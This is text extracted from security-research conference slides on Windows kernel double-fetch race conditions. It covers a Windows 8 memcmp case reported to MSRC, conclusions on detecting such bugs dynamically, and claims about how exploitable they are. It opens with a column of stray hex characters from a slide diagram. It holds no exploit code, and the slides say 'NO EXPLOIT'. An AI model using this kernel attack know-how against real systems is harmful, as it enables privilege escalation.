2
c
6
e
3
d
6
f
0
0
1
2
6
5
7
2
0
0
5
8
6
e
6
5
2
0
0
0
6
f ptr2 →
2
0
7
2
6
f
7
8
7
8
5
4
6
8
6
5
2
0
f
f
7
9
7
9
5
3
5
3
6
3
6
3
Windows 8 memcmp double fetch
Attack scenario (phase 2)
Kernel: all good!
Kernel: return 0;
Windows 8 memcmp double fetch
• Do you know the first 4 bytes of the stream compared
against?
o or 4*n bytes in general (e.g. 8 bytes in previous example).
o zero, magic value, many options.
o can be brute-forced at the worst.
• You can fake equality of n-byte buffers with just this
knowledge.
o comparison of n bytes reduced to comparison of 4 bytes.
• We informed MSRC about the issue
o disregarded as none-to-low severity (agreed!)
o requires a rare, erroneous condition on a specific platform.
Windows 8 memcmp double fetch
NO EXPLOIT
DEMO
Conclusions
Conclusions
Identification of double fetch
• Dynamic approach works!
• But is strongly bound to code coverage
o if you find a very good way to improve it, you'll find more
issues.
• There are still likely tens of such bugs in the kernel.
o especially IOCTL handlers and such.
o something to look for when reviewing third-party drivers?
• Also, a few good admin-to-ring0 bugs lying around
o not fixed by MSFT due to low severity
Conclusions
Exploitability
• Little research done in the area so far.
o correlates with volume of race conditions found in the past.
• Attackers can usually control more than they think.
o code execution timings can be influenced in a plethora of ways.
• Some techniques were developed during the research.
o we hope to see more.
• In general, every double fetch is exploitable with some
work.
o especially for core# ≥ 2
Conclusions
Future work
• Other platforms (Linux, BSD, ...)
• Other patterns
o double writes, neutralized exceptions, ...
• More coverage
o better test suites, nt/win32k/ioctl fuzzers?
• Better implementation
o HyperPwn, a VMM-based system instrumentation upcoming.
• Static program analysis
Conclusions
Final word: CPU-level instrumentation seems to be a
"fountain of 0-day" (© Travis Goodspeed).
Go and play with it. (Bochspwn / HyperPwn later this year)
Questions?
@j00ru
http://j00ru.vexillium.org/
@gynvael
http://gynvael.coldwind.pl/
References
[1] http://labs.mwrinfosecurity.com/blog/2013/03/06/pwn2own-at-cansecwest-2013/
[2] http://blogs.technet.com/b/srd/archive/2008/10/14/ms08-061-the-case-of-the-kernel-mode-double-
fetch.aspx
[3] http://www.alex-ionescu.com/?p=39
[4] http://www.mista.nu/research/mandt-win32k-paper.pdf
[5] http://j00ru.vexillium.org/?p=1594